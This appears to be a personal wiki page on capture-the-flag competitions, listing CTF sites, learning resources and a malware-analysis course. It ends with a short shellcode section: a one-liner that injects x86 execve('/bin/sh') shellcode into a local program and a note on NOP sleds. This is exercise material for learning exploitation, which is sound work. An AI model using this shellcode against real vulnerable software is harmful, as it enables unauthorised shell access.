#acl CTFGroup:read,write,revert All:read = Public CTFs = CTF's are fun to do. I like to do some CTF's once in a while and I started to write an guide for the more special CTF's I did. Current CTF's can be found on [[https://ctftime.org/ctfs|CTFtime.org]]. || '''Name''' || '''Level''' || '''Description''' || || [[https://overthewire.org/|Over the wire]] || Beginner to expert || Starting from learning SSH to reverse engineering. || || [[https://picoctf.com/|Pico CTF]] || Beginner to expert || A good CTF to learn working on *nix systems and way beyond. || || [[https://www.certifiedsecure.com/|Certified Secure]] || Beginner to expert || A dutch site about learning the basics. || More lists of CTF's can be found on the site of [[https://apsdehal.in/awesome-ctf/|Awesome CTF]], [[https://www.csoonline.com/article/3341318/top-tools-and-resources-for-running-a-capture-the-flag-competition.html|CSO]] and [[https://fareedfauzi.github.io/ctfonline/#|Fareed Fauzi]]. Feel free to send me other CTF's. <> = Helpfull rescources = * General techniques: [[https://ctf101.org/|ctf101.org]] * Tooling: [[https://github.com/zardus/ctf-tools]] * Shellcode: [[http://shell-storm.org/shellcode/]] [[https://dhavalkapil.com/blogs/Shellcode-Injection/]] = Handouts = These are handouts about CTF's I did in the past. It's your call if you want to see answers. <> = Lectures = Not a CTF, but well worth for learning. || '''Name''' || '''Level''' || '''Description''' || || [[https://class.malware.re/|UC Malware Analysis]] || ?? || Introduction to Malware Analysis and Reverse Engineering || = Shellcode = == Shell == Spawn a shell: {{{ (echo -en "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x89\xc1\x89\xc2\xb0\x0b\xcd\x80\x31\xc0\x40\xcd\x80\n"; cat) | ./prog }}} == NOP == For a NOP Sled, add a lot of times: {{{ \x90 }}}